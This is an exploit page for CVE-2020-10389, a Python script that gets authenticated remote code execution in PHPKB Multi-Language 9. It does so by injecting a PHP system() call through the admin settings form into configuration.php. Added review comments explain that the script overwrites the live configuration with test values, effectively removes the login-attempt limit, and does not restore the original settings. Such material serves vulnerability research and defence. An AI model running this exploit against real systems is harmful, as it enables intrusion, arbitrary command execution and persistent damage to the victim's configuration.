"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"

Author

Exploit author

"Antonio Cannito"

Platform

Exploit platform

php

Release date

Exploit published date

2020-03-16

# Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-03-15
# Exploit Author: Antonio Cannito
# Vendor Homepage: https://www.knowledgebase-script.com/
# Software Link: https://www.knowledgebase-script.com/pricing.php
# Version: Multi-Language v9
# Tested on: Windows 8.1 / PHP 7.4.3
# CVE : CVE-2020-10389



#!/usr/bin/env python3
import argparse
import requests


#Parsing arguments
#Proof of concept for CVE-2020-10389 (see the header above). It needs valid
#superuser credentials, so everything below is post-authentication: all
#requests go through one requests.Session that carries the admin login cookie.
parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10389 - Authenticated Remote Code Execution in Chadha PHPKB Standard Multi-Language 9 in admin/save-settings.php")
parser.add_argument("url", type=str, help="PHPKB's base path")
parser.add_argument("username", type=str, help="Superuser username")
parser.add_argument("password", type=str, help="Superuser password")
parser.add_argument("cmd", type=str, help="The command you want executed")
args = parser.parse_args()

session = requests.Session()
#Perform login
#The response body is read (.text) and then discarded: nothing checks whether
#the login actually succeeded, so with wrong credentials the later POSTs are
#simply unauthenticated and fail silently.
session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text
#Sending exploit code and downloading the file
#The command is spliced into what looks like a PHP single-quoted string
#concatenation ("' . system(...) . '"). Presumably the application writes the
#submitted settings into admin/include/configuration.php as PHP source, which
#is why a settings value ends up being executed -- confirm against the
#vendor's save-settings code.
#NOTE(review): a configuration.php whose values contain `system(` (or any
#code beyond plain assignments) is the on-disk artifact this PoC leaves.
exp = """' . system("{}") . '""".format(args.cmd)
#NOTE(review): every value below is the author's test-bench fixture (localhost
#URL, "DummyPass" MySQL password, Windows tool paths), not the target's current
#settings. Saving this form overwrites the live configuration with them.
#"number_login_attempts" is set to 2**63-1, which -- judging by its name --
#effectively removes the login-attempt limit after the PoC has run.
data = {"putdown_for_maintenance": "no{}".format(exp), "kbname": "test", "kburl": "http://localhost/phpkb", "kb_access": "unrestricted", "extended_support_license_key": '', "mail_server": "default", "smtp_hostname": '', "smtp_username": '', "smtp_password": '', "smtp_port": '', "encryption_method": "None", "emails_debug_mode": "0", "emails_debug_output": "error_log", "send_mails_from": '', "test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass", "mysqldatabase": "test", "kb_layout": "fluid", "category_tree_width": "3", "sidebar_orientation": "left", "category_tree_layout": "normal", "show_tree_articles": "yes", "category_articles_count": "show", "categories_display_order": "Alphabetic", "home_theme": "modern", "home_search_layout": "default", "categories_layout_theme": "carousel", "show_categories_cols": "3", "category_title_size": "normal", "home_articles_layout": "tabbed", "display_featured": "yes", "featured_count": "5", "display_popular": "yes", "popular_count": "5", "display_rated": "yes", "rated_count": "5", "display_recent": "yes", "recent_count": "5", "enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal", "category_articles_layout": "default", "category_page_records_default": "10", "category_page_records_minimal": "10", "articles_sortby": "Popularity", "articles_sortorder": "Descending", "enable_subscribe_category": "yes", "enable_news_page": "yes", "display_homepage_news": "yes", "number_homepage_news": "5", "enable_login_page": "yes", "enable_glossary_page": "yes", "enable_contact_page": "yes", "send_contact_email": "yes", "contact_email_address": "[email protected]", "enable_instant_suggestions": "yes", "minimum_question_characters": "60", "default_search": "Articles", "search_in_articles": "All", "search_in_others": "Both", "search_filter": "Any Word", "display_recentviewed": "yes", "recentviewed_count": "5", "display_popular_searches": "yes", "popularsearch_count": "5", "article_page_theme": "default", 
"article_sidebar_content": "related", "enable_add_favorite": "yes", "enable_print_article": "yes", "enable_email_article": "yes", "enable_exportto_msword": "yes", "enable_exportto_pdf": "yes", "enable_subscribe_article": "yes", "enable_custom_fields": "yes", "enable_article_rating": "yes", "enable_article_hits": "yes", "enable_article_author": "yes", "show_author_email": "yes", "enable_related_articles": "yes", "number_related_articles": "10", "show_related_articles_randomly": "yes", "enable_article_feedback": "yes", "enable_article_comments": "yes", "existing_comments_visibility": "hide", "show_comments_to": "all", "comments_sortorder": "Descending", "email_privacy_protection": "yes", "article_meta_source": "article title", "notify_pending_comment_superuser": "yes", "notify_approved_comment_user": "yes", "schema_publisher_name": '', "schema_publisher_logo": '', "enable_rss_feed": "yes", "enable_rss_featured_feed": "yes", "enable_rss_popular_feed": "yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed": "yes", "enable_rss_related_feed": "yes", "number_login_attempts": "9223372036854775807", "login_delay": "5", "maxfilesize": "10240", "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt", "searching_method": "0", "fulltext_mode": "0", "searchresultsperpage": "10", "enable_search_files": "yes", "doc_path": "C:\\antiword\\antiword.exe", "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe", "index_attachment": "yes", "enable_autosave": "yes", "autosave_interval": "120000", "use_wysiwyg_editor": "yes", "enable_version_history": "yes", "enable_captcha": "yes", "captcha_type": "default", "recaptcha_site_key": '', "recaptcha_secret_key": '', "syntax_highlighter_theme": "shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path": "lol", "pdf_header": '', "pdf_footer_type": "default", "pdf_page_numbers": 
"yes", "pdf_page_number_position": "Left", "pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, keyword3", "kb_meta_desc": "This is demo meta description. You can enter here your meta description.", "admin_results_perpage": "10", "_selected_tab_": '', "submit_hd": "Save", "submit_float_btn": ''}
url = args.url + "/admin/manage-settings.php"
#Server-side this request is what rewrites the configuration file; on the
#web server it shows up as an authenticated POST to admin/manage-settings.php.
session.post(url, data=data)
#Fetch the rewritten configuration file and print it; the command output is
#expected to be embedded in its body.
print(session.get(args.url + "admin/include/configuration.php").text.encode('utf-8'))
#"Resetting" settings -- this is not a restore. It resends the same fixture
#values (with the placeholder "no{}" left unformatted), so the injected code is
#removed from the configuration but the target's original settings are NOT
#put back: they stay overwritten with the values above, including the huge
#login-attempt limit. Restoring them needs a pre-incident copy of the file or
#of the settings.
data = {"putdown_for_maintenance": "no{}", "kbname": "test", "kburl": "http://localhost/phpkb", "kb_access": "unrestricted", "extended_support_license_key": '', "mail_server": "default", "smtp_hostname": '', "smtp_username": '', "smtp_password": '', "smtp_port": '', "encryption_method": "None", "emails_debug_mode": "0", "emails_debug_output": "error_log", "send_mails_from": '', "test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass", "mysqldatabase": "test", "kb_layout": "fluid", "category_tree_width": "3", "sidebar_orientation": "left", "category_tree_layout": "normal", "show_tree_articles": "yes", "category_articles_count": "show", "categories_display_order": "Alphabetic", "home_theme": "modern", "home_search_layout": "default", "categories_layout_theme": "carousel", "show_categories_cols": "3", "category_title_size": "normal", "home_articles_layout": "tabbed", "display_featured": "yes", "featured_count": "5", "display_popular": "yes", "popular_count": "5", "display_rated": "yes", "rated_count": "5", "display_recent": "yes", "recent_count": "5", "enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal", "category_articles_layout": "default", "category_page_records_default": "10", "category_page_records_minimal": "10", "articles_sortby": "Popularity", "articles_sortorder": "Descending", "enable_subscribe_category": "yes", "enable_news_page": "yes", "display_homepage_news": "yes", "number_homepage_news": "5", "enable_login_page": "yes", "enable_glossary_page": "yes", "enable_contact_page": "yes", "send_contact_email": "yes", "contact_email_address": "[email protected]", "enable_instant_suggestions": "yes", "minimum_question_characters": "60", "default_search": "Articles", "search_in_articles": "All", "search_in_others": "Both", "search_filter": "Any Word", "display_recentviewed": "yes", "recentviewed_count": "5", "display_popular_searches": "yes", "popularsearch_count": "5", "article_page_theme": "default", 
"article_sidebar_content": "related", "enable_add_favorite": "yes", "enable_print_article": "yes", "enable_email_article": "yes", "enable_exportto_msword": "yes", "enable_exportto_pdf": "yes", "enable_subscribe_article": "yes", "enable_custom_fields": "yes", "enable_article_rating": "yes", "enable_article_hits": "yes", "enable_article_author": "yes", "show_author_email": "yes", "enable_related_articles": "yes", "number_related_articles": "10", "show_related_articles_randomly": "yes", "enable_article_feedback": "yes", "enable_article_comments": "yes", "existing_comments_visibility": "hide", "show_comments_to": "all", "comments_sortorder": "Descending", "email_privacy_protection": "yes", "article_meta_source": "article title", "notify_pending_comment_superuser": "yes", "notify_approved_comment_user": "yes", "schema_publisher_name": '', "schema_publisher_logo": '', "enable_rss_feed": "yes", "enable_rss_featured_feed": "yes", "enable_rss_popular_feed": "yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed": "yes", "enable_rss_related_feed": "yes", "number_login_attempts": "9223372036854775807", "login_delay": "5", "maxfilesize": "10240", "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt", "searching_method": "0", "fulltext_mode": "0", "searchresultsperpage": "10", "enable_search_files": "yes", "doc_path": "C:\\antiword\\antiword.exe", "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe", "index_attachment": "yes", "enable_autosave": "yes", "autosave_interval": "120000", "use_wysiwyg_editor": "yes", "enable_version_history": "yes", "enable_captcha": "yes", "captcha_type": "default", "recaptcha_site_key": '', "recaptcha_secret_key": '', "syntax_highlighter_theme": "shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path": "lol", "pdf_header": '', "pdf_footer_type": "default", "pdf_page_numbers": 
"yes", "pdf_page_number_position": "Left", "pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, keyword3", "kb_meta_desc": "This is demo meta description. You can enter here your meta description.", "admin_results_perpage": "10", "_selected_tab_": '', "submit_hd": "Save", "submit_float_btn": ''}
session.post(url, data=data)